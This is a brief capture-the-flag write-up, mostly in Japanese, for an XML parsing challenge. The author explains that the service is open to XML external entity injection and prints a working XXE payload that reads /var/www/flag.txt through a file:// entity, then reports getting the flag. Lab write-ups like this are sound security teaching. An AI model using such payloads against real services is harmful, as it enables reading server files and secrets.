I've been working on a XML parsing service. It's not finished but there should be enough for you to try out.
The flag is in /var/www
Connect with:
URLにアクセスすると謎のサイトのようだ。
EXtravagant XML
Home
フラグは/var/www
にあり、XMLをパースするサービスのようである。
TrialでXMLファイルをアップロードし、Viewでファイル名を指定して確認できるらしい。
XXEを狙う。
/var/www
にフラグがあるようなので以下に示すxxe.xmlで/var/www/flag.txt
を読み取る。
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///var/www/flag.txt" >]><foo>&xxe;</foo>
アップロードし、ファイルを確認するとflagが得られた。
flag
flag.png